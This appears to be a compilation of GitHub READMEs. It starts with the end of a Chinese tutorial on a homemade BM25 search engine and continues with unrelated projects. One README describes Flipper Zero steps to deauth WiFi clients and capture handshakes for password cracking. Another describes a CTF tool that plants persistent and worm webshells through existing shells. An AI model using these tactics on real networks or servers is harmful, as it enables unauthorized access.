开始算 4. 计算该 HTML 的总长度,搜索算法需要 5. 按照一定格式,组装成倒排索引值,形式如下: ```go // 分表的顺序,例如 0f 转为十进制为 15 strconv.Itoa(i) + "," + // pages.id 该 URL 的主键 ID strconv.Itoa(int(pages.ID)) + "," + // 词频:这个词在该 HTML 中出现的次数 strconv.Itoa(v.count) + "," + // 该 HTML 的总长度,BM25 算法需要 strconv.Itoa(textLength) + "," + // 这个词出现的每一个位置,用逗号隔开,可能有多个 strings.Join(v.positions, ",") + // 不同 page 之间的间隔符 "-" ``` 我们按照这个规则,把所有的 HTML 进行倒排索引,并且把生成的索引值拼接在一起,存入 MySQL 即可。 ### 使用协程 + Redis 大幅提升词典生成速度 不知道大家感受到了没有,词典的生成是一个比爬虫高几个数量级的 CPU 消耗大户,一个 HTML 动辄几千个词,如果你要对数亿个 HTML 进行倒排索引,需要的计算量是非常惊人的。我爬到了 3600 万个页面,但是只处理了不到 800 万个页面的倒排索引,因为我的计算资源也有限... 并且,把词典的内容存到 MySQL 里难度也很大,因为一些常见词的倒排索引会巨长,例如“没有”这个词,真的是到处都有它。那该怎么做性能优化呢?还是我们的老朋友,协程和 Redis。 #### 协程分词 两个 HTML 的分词工作之间完全没有交集,非常适合拿协程来跑。 但是,MySQL 举手了:我顶不住。所以协程的好朋友 Redis 也来了。 #### 使用 Redis 做为词典数据的中转站 我们在 Redis 中针对每一个词生成一个 List,把倒排出来的索引插入到尾部: ```go db.Rdb10.RPush(db.Ctx, word, appendSrting) ``` #### 使用协程从 Redis 搬运数据到 MySQL 中 你没看错,这个地方也需要使用协程,因为数据量实在是太大了,一个线程循环跑会非常慢。经过我的不断尝试,我发现每次转移 2000 个词,对 Redis 的负载比较能够接受,E5-V4 的 CPU 单核能够跑满,带宽大概 400Mbps。 从 Redis 到 MySQL 的高性能搬运方法如下: 1. 随机获取一个 key 2. 判断该 key 的长度,只有大于等于 2 的进入下一步 3. 把最后一个索引值留下,前面的元素一个一个`LPop`(弹出头部)出来,拼接在一起 4. 汇集一批 2000 个随机词的结果,append 到数据库该词现有索引值的后面 有了协程和 Redis 的协助,分词加倒排索引的速度快了起来,但是如果你选择一个词一个词地 append 值,你会发现 MySQL 又双叒叕变的超慢,又要优化 MySQL 了!🙊 ### 事务的妙用:MySQL 高速批量插入 由于需要往磁盘里写东西,所以只要是一个一个 update,怎么优化都会很慢,那有没有一次性 update 多行数据的方法呢?有!那就是事务: ```go tx.Exec(`START TRANSACTION`) // 需要批量执行的 update 语句 for w, s := range needUpdate { tx.Exec(`UPDATE word_dics SET positions = concat(ifnull(positions,''), ?) 
where name = ?`, s, w) } tx.Exec(`COMMIT`) ``` 这么操作,字典写入速度一下子起来了。但是,每次执行 2000 条 update 语句对磁盘的要求非常高,我进行这个操作的时候,可以把磁盘写入速度瞬间提升到 1.5GB/S,如果你的数据库存储不够快,可以减少语句数量。 ### 世界的参差:无意义的词 这个世界上的东西并不都是有用的,一个 HTML 中的字符也是如此。 首先,一般不建议索引整个 HTML,而是把他用 DOM 库处理一下,提取出文本内容,再进行索引。 其次,即便是你已经过滤掉了所有的 html 标签、css、js 代码等,还是有些词频繁地出现:它们出现的频率如此的高,以至于反而失去了作为搜索词的价值。这个时候,我们就需要把他们狠狠地拉黑,不处理他们的倒排索引。我使用的黑名单词如下,表名为`word_black_list`,只有两个字段 id、word,需要的自取: ```ruby INSERT INTO `word_black_list` (`id`, `word`) VALUES (1, 'px'), (2, '20'), (3, '('), (4, ')'), (5, ','), (6, '.'), (7, '-'), (8, '/'), (9, ':'), (10, 'var'), (11, '的'), (12, 'com'), (13, ';'), (14, '['), (15, ']'), (16, '{'), (17, '}'), (18, '\''), (19, '\"'), (20, '_'), (21, '?'), (22, 'function'), (23, 'document'), (24, '|'), (25, '='), (26, 'html'), (27, '内容'), (28, '0'), (29, '1'), (30, '3'), (31, 'https'), (32, 'http'), (33, '2'), (34, '!'), (35, 'window'), (36, 'if'), (37, '“'), (38, '”'), (39, '。'), (40, 'src'), (41, '中'), (42, '了'), (43, '6'), (44, '。'), (45, '<'), (46, '>'), (47, '联系'), (48, '号'), (49, 'getElementsByTagName'), (50, '5'), (51, '、'), (52, 'script'), (53, 'js'); ``` 至此,字典的处理告一段落,下面让我们一起 Just 搜 it! ## 第三步,使用 BM25 算法给出搜索结果 网上关于 BM25 算法的文章是不是看起来都有点懵?别担心,看完下面这段文字,我保证你能自己写出来这个算法的具体实现,这种有具体文档的工作是最好做的了,比前面的性能优化简单多了。 ### 简单介绍一下 BM25 算法 BM25 算法是现代搜索引擎的基础,它可以很好地反映一个词和一堆文本的相关性。它拥有不少独特的设计思想,我们下面会详细解释。 这个算法第一次被生产系统使用是在 1980 年代的伦敦城市大学,在一个名为 Okapi 的信息检索系统中被实现出来,而原型算法来自 1970 年代 Stephen E. Robertson、Karen Spärck Jones 和他们的同伴开发的概率检索框架。所以这个算法也叫 Okapi BM25,这里的 BM 代表的是`best matching`(最佳匹配),非常实在,和比亚迪的“美梦成真”有的一拼(Build Your Dreams)😂 ### 详细讲解 BM25 算法数学表达式的含义 ![](https://qn.lvwenhan.com/2023-06-30-16880554899557.jpg) 我简单描述一下这个算法的含义。 首先,假设我们有 100 个页面,并且已经对他们分词,并全部生成了倒排索引。此时,我们需要搜索这句话“BM25 算法的数学描述”,我们就需要按照以下步骤来计算: 1. 对“BM25 算法的数学描述”进行分词,得到“BM25”、“算法”、“的”、“数学”、“描述”五个词 2. 拿出这五个词的全部字典信息,假设包含这五个词的页面一共有 50 个 3. 逐个计算这五个词和这 50 个页面的`相关性权重`和`相关性得分`的乘积(当然,不是每个词都出现在了这 50 个网页中,有多少算多少) 4. 把这 50 页面的分数分别求和,再倒序排列,即可以获得“BM25 算法的数学描述”这句话在这 100 个页面中的搜索结果 `相关性权重`和`相关性得分`名字相似,别搞混了,它们的具体定义如下: #### 某个词和包含它的某个页面的“相关性权重” ![](https://qn.lvwenhan.com/2023-06-30-16880562026300.jpg) 上图中的`Wi`指代的就是相关性权重,最常用的是`TF-IDF`算法中的`IDF`权重计算法: ![](https://qn.lvwenhan.com/2023-06-30-16880562733047.jpg) 这里的 N 指的是页面总数,就是你已经加入字典的页面数量,需要动态扫描 MySQL 字典,对我来说就是 784 万。而`n(Qi)`就是这个词的字典长度,就是含有这个词的页面有多少个,就是我们字典值中`-`出现的次数。 这个参数的现实意义是:如果一个词在很多页面里面都出现了,那说明这个词不重要,例如百分百空手接白刃的“的”字,哪个页面都有,说明这个词不准确,进而它就不重要。 词以稀为贵。 我的代码实现如下: ```go // 页面总数 db.DbInstance0.Raw("select count(*) from pages_0f where dic_done = 1").Scan(&N) N *= 256 // 字典的值中`-`出现的次数 NQi := len(partsArr) // 得出相关性权重 IDF := math.Log10((float64(N-NQi) + 0.5) / (float64(NQi) + 0.5)) ``` #### 某个词和包含它的某个页面的“相关性得分” ![](https://qn.lvwenhan.com/2023-06-30-16880570104402.jpg) 这个表达式看起来是不是很复杂,但是它的复杂度是为了处理查询语句里面某一个关键词出现了多次的情况,例如“八百标兵奔北坡,炮兵并排北边跑。炮兵怕把标兵碰,标兵怕碰炮兵炮。”,“炮兵”这个词出现了 3 次。为了能快速实现一个能用的搜索引擎,我们放弃支持这种情况,然后这个看起来就刺激的表达式就可以简化成下面这种形式: ![](https://qn.lvwenhan.com/2023-06-30-16880571028529.jpg) 需要注意的是,这里面的大写的 K 依然是上面那个略微复杂的样式。我们取 k1 为 2,b 为 0.75,页面(文档)平均长度我自己跑了一个,13214,你们可以用我这个数,也可以自己跑一个用。 我的代码实现如下: ```go // 使用 - 切分后的值,为此页面的字典值,形式为: // 110,85,1,195653,7101 ints := strings.Split(p, ",") // 这个词在这个页面中出现总次数 Fi, err := strconv.Atoi(ints[2]) // 这个页面的长度 Dj, _ := strconv.Atoi(ints[3]) k1 := 2.0 b := 0.75 // 页面平均长度 avgDocLength := 13214.0 // 得到相关性得分 RQiDj := (float64(Fi) * (k1 + 1)) / (float64(Fi) + k1*(1-b+b*(float64(Dj)/avgDocLength))) ``` #### 怎么样,是不是比你想象的简单? 
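To make the simplified scoring easier to check against the Go snippets above (the formula images may not render everywhere), here it is written out; f_i is the number of times q_i appears in page D_j, |D_j| is the page length, N is the number of indexed pages, and n(q_i) is the number of pages whose dictionary entry contains q_i:

$$
\mathrm{score}(Q, D_j) = \sum_{q_i \in Q} \mathrm{IDF}(q_i)\cdot\frac{f_i\,(k_1+1)}{f_i + k_1\left(1 - b + b\,\frac{|D_j|}{\mathrm{avgdl}}\right)},
\qquad
\mathrm{IDF}(q_i) = \log_{10}\frac{N - n(q_i) + 0.5}{n(q_i) + 0.5}
$$

with k_1 = 2, b = 0.75 and avgdl = 13214, exactly as in the code.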
### Checking the search results

On the "翰哥搜索" (Brother Han Search) page I built, I searched for "BM25 算法的数学描述" ("the mathematical description of the BM25 algorithm"); the results are as follows:

![](https://qn.lvwenhan.com/2023-07-04-16884473624549.jpg)

I searched for "住范儿" (Zhufaner); the results are as follows:

![](https://qn.lvwenhan.com/2023-06-30-16880596117906.jpg)

The first hit is our official site — pretty accurate, I'd say.

The results look decent, and keep in mind this is searching only 7.84 million pages. If you have enough server resources to pull off crawling, indexing and querying 300 million pages, the results will certainly be even better.

### How to improve search accuracy further?

Our simplified BM25 search results are already usable. Can the accuracy still be improved? It can:

1. Everything in this article uses a dictionary built from word segmentation. You can build a second one based on single characters, then combine the single-character ranking with the word-segmentation ranking for more accurate results.
2. By the same principle, building more sensible and richer tokenization schemes, and dictionaries with different biases, can improve results in specific domains, such as medicine or code.
3. Build your own PageRank: score the value of each URL based on the relationships between URLs, and feed that score into the ranking parameters of the search results.
4. Introduce proximity-style similarity: consider not only exactly matched keywords but also results for keywords with similar meanings.
5. Handle special queries: correct likely user typos, support the pinyin-matching needs unique to Chinese, and so on.

### References

1. 【NLP】非监督文本匹配算法——BM25 (Unsupervised text matching: BM25) — https://zhuanlan.zhihu.com/p/499906089
2. 《自制搜索引擎》(Self-Made Search Engine) — [JP] 山田浩之, 末永匡

The article is over — did you manage to learn it? You are welcome to leave comments at:

1. GitHub: https://github.com/johnlui/DIY-Search-Engine
2. Blog: https://lvwenhan.com/tech-epic/509.html

[End of article]

<hr>

# How to run this project

First, get yourself a cup of coffee.

1. Download this project to your machine
2. Build it: `go build -o ese *.go`
3. Edit the configuration: `cp .env.example .env`, then change the database and Redis settings inside to your own
4. Run `./ese art init` to create the database
5. Manually insert one real URL into the `pages_00` table; only the url and host fields need to be filled in
6. Run `./ese` and wait for good things to happen ☕️

After a while, once the dictionary table `word_dics` has been populated, open [http://127.0.0.1:10086](http://127.0.0.1:10086) and try a search! 🔍

#### For more information on running the project, see the [wiki](https://github.com/johnlui/DIY-Search-Engine/wiki)
#### Read the article directly on the web: https://lvwenhan.com/tech-epic/509.html

### About the author

1. Name: 吕文翰
2. GitHub: [johnlui](https://github.com/johnlui)
3. Position: CTO of 住范儿

![WeChat official account](https://lvwenhan.com/content/uploadfile/202301/79c41673579170.jpg)

### Article copyright notice

The copyright of this article belongs to [吕文翰](https://github.com/johnlui). It is published under the [CC BY-NC-ND 4.0](https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.zh-Hans) license and is free to read for GitHub users.

<a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.zh-Hans"><img alt="Creative Commons License" style="border-width:0" src="https://i.creativecommons.org/l/by-nc-nd/4.0/88x31.png" /></a>

### Code license

The code in this project is open-sourced under the MIT license.
aigenprotocol/aigen
https://github.com/aigenprotocol/aigen
Aigen's open-source implementation of various tools to create AINFTs effortlessly
<div align="center"> <img src="https://aigenprotocol.com/static/media/aigen-logo-light.fad5403b0fa280336867e8ea8400db40.svg" /> <h3> Aigen's open-source tools to create AINFTs effortlessly </h3> </div> ### create environment variables #### create a .env file and put these variables ``` ACCOUNT_ADDRESS=0x0000000000000000000000000000000000000000 PRIVATE_KEY=000000000000000000000000000000000000000000000000000000000000000 AINFT_CONTRACT_ADDRESS=0x000000000000000000000000000000000000 PROVIDER_URL=http://0.0.0.0:8545 NFTSTORAGE_TOKEN=<NFTStorage Token> MODELS_DIR=/Users/apple/aigen ``` ### compile & deploy AINFTToken.sol smart contract The smart contract can be found at contracts->AINFTToken.sol ##### compile ``` npm run compileAINFTTokenContract ``` #### deploy ``` npm run deployAINFTTokenContract ``` this will automatically deploy the smart contract to 'PROVIDER_URL' Note: * Using Remix IDE, deploy the smart contract to the local Ganache or Goerli testnet. * It is recommended that you test the smart contract before deploying it to the mainnet. ### commands #### install python dependencies ``` pip install -r requirements ``` #### extract model weights and create shards in a single command ``` python main.py --action "create_shards" -n "test" -m "<path-to-model.h5>" -no 20 ``` provide model name, model path and no of ainfts to create * For the time being, we only support Keras models ### code ### extract and save model weights ``` from ai import save_model save_model(model_name=model_name, model_dir=MODELS_DIR, model_path=model_path) ``` provide model name and local model path to start extracting weights ### create shards of model weights ``` from ai import create_shards create_shards(model_name=model_name, model_dir=MODELS_DIR, no_of_ainfts=no_of_ainfts) ``` provide model name and no of ainfts to create. This function will automatically create shards from model weights ### install node dependencies ``` npm install or yarn ``` ### mint ainfts ``` npm run ainft --action="createAINFT" --model_name="Test" --model_dir="/Users/apple/aigen/test" ``` this step will deploy files to NFTStorage and mint AINFTs ### download AINFTs ``` npm run ainft --action=downloadAINFT --model_name=test --model_dir="/Users/apple/aigen/test" ``` this will automatically download and decrypt content of AINFTs ### merge model shards ``` python main.py --action "merge_shards" --name test ``` this will merge shards back to recover the original weight files ### load model (keras) ``` python main.py --action "load_model" --name test ``` this will load model from merged shards ## License <a href="LICENSE.rst"><img src="https://img.shields.io/github/license/aigenprotocol/aigen"></a> This project is licensed under the MIT License - see the [LICENSE](LICENSE.rst) file for details
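As a rough, hypothetical illustration of the sharding idea behind the commands above — splitting a saved weights file into byte-range shards and later concatenating them back in order — the core mechanics might look like the sketch below. This is not the project's actual implementation; file names and helper functions are made up for the example.

```python
from pathlib import Path

def split_into_shards(weights_path: str, out_dir: str, n_shards: int) -> list[Path]:
    """Split a weights file into n_shards byte-range shards (illustrative only)."""
    data = Path(weights_path).read_bytes()
    out = Path(out_dir)
    out.mkdir(parents=True, exist_ok=True)
    size = -(-len(data) // n_shards)  # ceiling division
    shards = []
    for i in range(n_shards):
        shard = out / f"shard_{i:04d}.bin"
        shard.write_bytes(data[i * size:(i + 1) * size])
        shards.append(shard)
    return shards

def merge_shards(shard_dir: str, merged_path: str) -> None:
    """Concatenate the shards back in order to recover the original file."""
    shards = sorted(Path(shard_dir).glob("shard_*.bin"))
    with open(merged_path, "wb") as f:
        for shard in shards:
            f.write(shard.read_bytes())
```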
efenatuyo/xolo-sniper-recode
https://github.com/efenatuyo/xolo-sniper-recode
decided to fully rewrite the code to make the ugc sniper faster
# xolo-sniper-recode

Decided to fully rewrite the code to make the UGC sniper faster.
grugnoymeme/flipperzero-GUI-wifi-cracker
https://github.com/grugnoymeme/flipperzero-GUI-wifi-cracker
GUI - Analyze WPA/WPA2 handshakes from FlipperZero's captured .pcaps to find out the WiFi Passwords.
# (flipperzero)-GUI-wifi-cracker

Would you like to be able to extract WPA/WPA2 handshakes from the Flipper Zero's captured .pcap files, analyze them with hashcat, and find out the passwords IN JUST ONE CLICK?

This is the GUI (Graphical User Interface) version of my other script and repo [`flipperzero-CLI-wifi-cracker`](https://github.com/grugnoymeme/flipperzero-CLI-wifi-cracker); I just wanted to make the process as easy as possible, and this is the result.

---

## Extraction of the .pcap files

You can automate the extraction of .pcap files from the Flipper Zero using [@0xchocolate](https://github.com/0xchocolate)'s companion app for [@JustCallMeKoKo](https://github.com/justcallmekoko)'s ESP32 Marauder.

Once you've connected the devboard and opened the app, follow these instructions:

```
Menu
 Apps
  WIFI / GPIO / GPIO EXTRA
   [ESP32] WiFi Marauder
    Scripts
     [+]ADD SCRIPT
      < Enter a name for your script >
      Save
     < Select your script >
      [+]EDIT STAGES
       [+]ADD STAGE
        [+]Deauth
       < Select Deauth >
        Timeout 1
        Save
        Back
       [+]ADD STAGE
        [+]Sniff RAW
       < Select Sniff RAW >
        Timeout 15 (or 10, maybe also 5 is ok)
        Save
        Back
      Back
      [*]SAVE
```

---

# Disclaimer

This tool is not developed by the Flipper Zero staff. Please note that the code you find in this repo is provided for educational purposes only and should NEVER be used for illegal activities.
kirillkuzin/cyberpunk2077ai
https://github.com/kirillkuzin/cyberpunk2077ai
🤖CyberAI is designed to bridge the world of Cyberpunk 2077 and the power of OpenAI's AI technology.
# CyberAI :robot:

Welcome to the CyberAI project! This plugin for Cyberpunk 2077 enables integration between the video game and the OpenAI API, opening a world of possibilities for enhancing the gameplay experience. With this plugin, you can call OpenAI API methods directly from the scripting level. Plugin development is still in progress. :construction:

![bg](bg.png)

## Installation :wrench:

1. Download the zip from the latest release
2. Move CyberAI.dll and Settings.json to red4ext\plugins\CyberAI
3. Open Settings.json and paste your OpenAI API key and organization id
4. If you want to access the plugin's functions from the CET console, you need to move CyberAI.reds to r6\scripts\CyberAI

## Usage :computer:

### Redscript

Ask GPT to generate an answer for you:

```
native func ScheduleChatCompletionRequest(chat_id: String, messages: array<array<String>>);

ScheduleChatCompletionRequest("your_custom_id", {{"System", "Speak as ..."}, {"User", "How are you?"}});
ScheduleChatCompletionRequest("your_custom_id", {{"User", "My name is V"}, {"User", "How are you and what's my name?"}});
```

You can collect your request and its answer once it is done:

```
native func GetAnswer(chat_id: String) -> String;
native func GetRequest(chat_id: String) -> String;

LogChannel(n"DEBUG", GetAnswer("your_custom_id"));
LogChannel(n"DEBUG", GetRequest("your_custom_id"));
```

You can iterate through the chat history, or you can get it as a string:

```
native func GetHistory(chat_id: String) -> array<array<String>>;
native func GetHistoryAsString(chat_id: String) -> String;

LogChannel(n"DEBUG", GetHistoryAsString("your_custom_id"));

let history = GetHistory(chat_id);
for completion in history {
  LogChannel(n"DEBUG", "Role: " + ToString(completion[0]) + "\nMessage: " + ToString(completion[1]));
}
```

Flushing a chat:

```
native func FlushChat(chat_id: String);

FlushChat("your_custom_id");
```

You need to pass your generated custom string ID to almost all functions. CyberAI will provide a new chat for every unique ID and keep its chat history.

:warning: <b>Whenever you make a chat request, the entire chat history is also sent to the OpenAI API.</b>

## Future Plans :rocket:

- **Eleven Labs Integration:** We plan to integrate with Eleven Labs to provide text-to-speech functionality, allowing the AI to generate audio responses in addition to text.
- **InWorld AI Integration:** We are exploring the possibility of integrating with InWorld AI, a powerful AI engine for creating characters. This could allow for even more dynamic and responsive AI characters in the game.

## Inspiration :bulb:

With this plugin, the possibilities are almost limitless. Here are just a few examples of what you can script with it:

- **AI-NPC Dialogue:** Use OpenAI's GPT to generate unique dialogue for non-player characters (NPCs), increasing the diversity and richness of in-game interactions.
- **Dynamic Plot Generation:** Use OpenAI to generate unique storylines or side quests based on in-game events or player actions.
- **Procedural Mission Planning:** Generate procedural missions based on context, NPC data, and player preferences using AI.
- **Interactive Environment:** Use AI to generate dynamic responses from the environment, making your exploration of Night City even more immersive.
- **Intelligent Enemy Tactics:** AI could control enemy tactics based on the player's strategy and actions, making combat more challenging and unpredictable.

Remember, these are just examples, and the only limit is your imagination!
## Credits :link: This project would not be possible without the following projects: - [red4ext-rs](https://github.com/jac3km4/red4ext-rs): A Rust binding for RED4ext, which provides an API to interact with the internals of Cyberpunk 2077. - [async-openai](https://github.com/64bit/async-openai): An asynchronous, modern Rust library for OpenAI API. - [OpenAI API](https://openai.com/blog/openai-api): OpenAI offers a general-purpose "text in, text out" interface, making it possible to use language models like GPT-3 in a wide range of applications. ## License :bookmark: This project is licensed under the terms of the MIT License. See the LICENSE file in the project's root directory for more details. Enjoy exploring the new world of Cyberpunk 2077 with the power of AI! :video_game: :joystick: ---
AQF0R/FUCK_AWD_TOOLS
https://github.com/AQF0R/FUCK_AWD_TOOLS
AWD
# Foreword

## Welcome to follow our WeChat official account: 朱厌安全团队 (Zhuyan Security Team). Thanks for your support!

### This is a tool for AWD (Attack With Defense) competitions. There may still be quite a few bugs and rough edges — please bear with us!!! Suggestions are very welcome, and if you run into a bug, please report it to us; we will look into it right away!

### The tool will continue to be maintained, and new modules will be added later — stay tuned!

# Tool introduction

To run the FUCK_AWD tool from cmd: `python fuck_awd_main.py`

If the colors in CMD are garbled, unzip ansi189-bin.zip, run the version compatible with your machine, and execute `ansicon.exe -i` in cmd.

The attack module works on the principle of using an existing webshell to plant more webshells, so make sure the scenario fits before using it!

Prerequisites for exploitation: the target server does not filter the system() function, you have write permission, and the target is a PHP website.

Attack module: currently supports single-target and batch-target attacks, batch command execution, three preset types of backdoor webshells to choose from (one-liner shell / undying shell / worm shell), batch saving of execution results after a run, and liveness monitoring of both preset and custom backdoors.

Defense module: supports directory-tree generation, one-click file backup, file monitoring, PHP file count checks, detection of dangerous PHP functions, one-click wrapping of PHP files with a WAF, and more.

# Tool screenshots

![image](https://github.com/AQF0R/FUCK_AWD_TOOLS/assets/120232326/45d8f3c6-fd49-4762-a3d9-f50d2acb72c1)
![image](https://github.com/AQF0R/FUCK_AWD_TOOLS/assets/120232326/a31e5939-b471-423f-9283-7ba5e311fe12)
![image](https://github.com/AQF0R/FUCK_AWD_TOOLS/assets/120232326/c3bd87db-e46d-44fb-b243-8296509d1768)
![image](https://github.com/AQF0R/FUCK_AWD_TOOLS/assets/120232326/5b895f1f-1bb2-49a5-9a4c-db31917de88f)
![image](https://github.com/AQF0R/FUCK_AWD_TOOLS/assets/120232326/0c175494-5e27-47e9-ae32-355dcf38f6b1)
![image](https://github.com/AQF0R/FUCK_AWD_TOOLS/assets/120232326/b0f95d57-26ba-49af-a76a-b2d687f66761)

## Extra knowledge

Hunting and killing memory webshells:

1. `ps auxww | grep shell.php`, find the PID and kill the process. Deleting the script file alone does nothing, because PHP has already read the script and is running it as interpreted opcode.
2. Restart PHP and the other web services.
3. Use a script with ignore_user_abort(true) that keeps racing to write the file (intermittently). Its usleep must be shorter than the value set by the opponent's undying shell.
4. Create a directory with the same name as the file generated by the undying shell.

Neutralizing curl:

- `alias curl='echo fuckoff'` — with lower privileges
- `chmod -x curl` — with higher privileges
- `/usr/bin` — the path where curl lives

Apache log paths:

- /var/log/apache2/
- /usr/local/apache2/logs
xun082/online-cooperative-edit
https://github.com/xun082/online-cooperative-edit
An online collaborative editor built on WebRTC
### Compiles and hot-reloads for development ``` npm start ``` ### Compiles and minifies for production ``` npm run build ``` This is the official base template for [Create Neat](https://github.com/xun082/react-cli). For more information, please refer to: - [Getting Started](https://github.com/xun082/react-cli) – How to create a new app.
ytdl-org/ytdl-nightly
https://github.com/ytdl-org/ytdl-nightly
Nightly builds for youtube-dl.
[![Build Status](https://github.com/ytdl-org/youtube-dl/workflows/CI/badge.svg)](https://github.com/ytdl-org/youtube-dl/actions?query=workflow%3ACI) **This repository is for youtube-dl nightly builds.** youtube-dl - download videos from youtube.com or other video platforms - [INSTALLATION](#installation) - [DESCRIPTION](#description) - [MORE INFORMATION](#more-information) - [COPYRIGHT](#copyright) # INSTALLATION These instructions are specific to this nightly release repository. Refer to the [installation instructions](https://github.com/ytdl-org/youtube-dl#installation) for the main repository (the "main instructions" below) for guidance on * the types of installation available * installation methods and command lines to adapt for each installation type. Find the appropriate build to install in the [Releases](https://github.com/ytdl-org/ytdl-nightly/releases) page here, rather than the URLs mentioned in the main instructions. Replace the download URL in the appropriate command line shown in the main instructions with the URL from the Releases page. These nightly releases are not available through package managers like _brew_. # DESCRIPTION **youtube-dl** is a command-line program to download videos from YouTube.com and a few more sites. It requires the Python interpreter, version 2.6, 2.7, or 3.2+, and it is not platform specific. It should work on your Unix box, on Windows or on macOS. It is released to the public domain, which means you can modify it, redistribute it or use it however you like. youtube-dl [OPTIONS] URL [URL...] # MORE INFORMATION For **more information**, or to **raise a support issue**, visit [the main site](https://github.com/ytdl-org/youtube-dl). Please contribute any pull requests at the main site as well, unless the change is specific to this nightly repository (eg, workflow improvements). # COPYRIGHT youtube-dl is released into the public domain by the copyright holders. This README file is likewise released into the public domain.
shemmee/TikTok-UI-Clone
https://github.com/shemmee/TikTok-UI-Clone
This is a TikTok UI Clone that replicates the TikTok feed and its elements, including smooth video scrolling. Explore an interactive interface similar to Tiktok and enjoy a seamless browsing experience.
# TikTok UI Clone The TikTok UI Clone is a web application developed to replicate the user interface of the TikTok app. It is built using React.js, CSS, and JSX, and allows users to browse and view TikTok-style videos in a familiar and interactive interface. # Features - Browse and view TikTok-style videos. - Smooth and responsive video playback. - User-friendly interface with intuitive navigation. - Infinite scrolling for seamless video discovery. - Like, comment, and share videos. - Follow users and explore personalized content. # Technologies & Tools Used - React.js - CSS - JSX - VS Code # Installation and Usage To use this TikTok UI Clone, follow these steps: - Clone the repository or download the source code. - Open the project in your preferred code editor. - Run `npm install` to install the necessary dependencies. - Run `npm start` to start the development server. - Open your browser and navigate to `http://localhost:3000` to access the app. # Demo A live demo of the TikTok UI Clone is available at [LINK TO LIVE DEMO](https://tik-tok-ui-clone-shemmee.vercel.app). # Credits The TikTok UI Clone was created by [s-shemmee](https://github.com/s-shemmee). # License This project is licensed under the MIT license.
mkirchhof/url
https://github.com/mkirchhof/url
Uncertainty-aware representation learning (URL) benchmark
# URL: A Representation Learning Benchmark for <br> Transferable Uncertainty Estimates Michael Kirchhof, Bálint Mucsányi, Seong Joon Oh, Enkelejda Kasneci ![URL Benchmark](plots/benchmark.png) _Representation learning has driven the field to develop pretrained models that generalize and transfer to new datasets. With the rising demand of reliable machine learning and uncertainty quantification, we seek pretrained models that output both an embedding and an uncertainty estimate, even on unseen datasets. To guide the development of such models, we propose the uncertainty-aware representation learning (URL) benchmark. It measures whether the uncertainty predicted by a model reliably reveals the uncertainty of its embedding. URL takes only four lines of code to implement but still has an information-theoretical backbone and correlates with human-perceived uncertainties. We apply URL to study ten large-scale uncertainty quantifiers that were pretrained on ImageNet and transfered to eight downstream datasets. We find that transferable uncertainty quantification is an unsolved open problem, but that it appears to be not at stakes with classical representation learning._ **Link**: [arxiv.org/abs/2307.03810](https://www.arxiv.org/abs/2307.03810) --- ## Installation **TL;DR:** Create a conda environment with ```conda env create -f requirements.yml```, then [download the datasets](#datasets). ### Conda environment Long answer: First, install Python 3.8.8 and PyTorch 1.10 with a CUDA backend that suits your GPU (in this case, CUDA 11.1) ``` pip install python=3.8.8 conda install pytorch==1.13.0 torchvision==0.14.0 torchaudio==0.13.0 pytorch-cuda=11.7 -c pytorch -c nvidia ``` Then, install the dependencies: ``` pip install matplotlib pyyaml huggingface_hub safetensors>=0.2 scipy==1.7.1 argparse==1.4.0 tueplots==0.0.5 wandb==0.13.5 torchmetrics==0.11.3 scikit-learn==0.24.1 pandas==1.2.4 conda install -c pytorch faiss-gpu ``` ### Datasets Now, download all datasets. The scripts search for them by default under ```./data```. You can adjust this via the arguments ```--data-dir``` for the upstream (ImageNet) dataset, ```--data-dir-downstream``` for the zero-shot downstream and further downstream datasets, and ```--real-labels``` and ```--soft-labels``` for the auxiliary ImageNet-RealH files. If your downstream datasets are spread over multiple directories, consider providing one folder that gives symlinks to them. Upstream dataset: [ImageNet-1k](https://www.image-net.org/download.php) ImageNet-RealH files: [raters.npz](https://github.com/google-research/reassessed-imagenet/blob/master/raters.npz) and [real.json](https://github.com/google-research/reassessed-imagenet/blob/master/real.json) Downstream datasets: [CUB200-211](https://www.dropbox.com/s/tjhf7fbxw5f9u0q/cub200.tar?dl=0), [CARS196](https://www.dropbox.com/s/zi2o92hzqekbmef/cars196.tar?dl=0), [Stanford Online Products](https://www.dropbox.com/s/fu8dgxulf10hns9/online_products.tar?dl=0) Further downstream datasets: [CIFAR-10H, Treeversity#1, Turkey, Pig, Benthic](https://doi.org/10.5281/zenodo.7152309) Please verify that your folder structure for the downstream datasets looks like this (note the folder names for each dataset): ``` cub200 └───images | └───BMW 3 Series Wagon 2012 | │ 00039.jpg | │ ... | ... cars196 └───images | └───001.Black_footed_Albatross | │ Black_Footed_Albatross_0001_796111.jpg | │ ... | ... online_products └───images | └───bicycle_final | │ 111085122871_0.jpg | ... | └───Info_Files | │ bicycle.txt | │ ... 
``` The further downstream datasets should look like this directly after unzipping ``` CIFAR10H/Treeversity#1/Turkey/Pig/Benthic └───fold1 | │ 182586_00.png | ... └───annotations.json ``` --- ## Training and Benchmarking your own Method Training happens in ```train.py```. This is adapted from the ```timm``` library, including all its models, to which we added various uncertainty output methods, so that all models have outputs of the form ```class_logits, uncertainties, embeddings = model(input)```. The best starting point to implement your own ideas would be to adapt the uncertainty output methods in ```./timm/models/layers/_uncertainizer.py```, implement losses in ```./timm/loss```, or enhance model architectures in ```./timm/models```. The URL benchmark is evaluated in ```validate.py```, which is called during training, but can also be used stand-alone if you prefer to train with your own code. An exemplary call would be ``` train.py --model=resnet50 --loss=elk --inv_temp=28 --unc-module=pred-net --unc_width=1024 --ssl=False --warmup-lr=0.0001 --lr-base=0.001 --sched=cosine --batch-size=128 --accumulation_steps=16 --epochs=32 --seed=1 --eval-metric avg_downstream_auroc_correct --log-wandb=True --data-dir=./data/ImageNet2012 --data-dir-downstream=./data --soft-labels=./data/raters.npz --real-labels=./data/real.json ``` The most important parameters are: * ```--model``` Which backbone to use. In our paper, we use ```resnet50``` and ```vit_medium_patch16_gap_256```. * ```--loss``` Which loss to use. Note that some approaches, like MCDropout, use a ```cross-entropy``` loss, but specify other parameters to make them into their own loss. Please refer to the example codes below. * ```--inv_temp``` The hyperparameter constant the distances in the softmax exponentials are multiplied by. This can also be understood as the inverse of the temperature. Some approaches require further hyperparameters. Please refer to the example codes below. * ```--unc-module``` How to calculate the uncertainty attached to each embedding. Popular choices are an explicit ```pred-net``` module attached to the model or the ```class-entropy``` of the predicted upstream class label distribution. These uncertainty modules are implemented as wrappers around the models, so that any combination of model backbone and 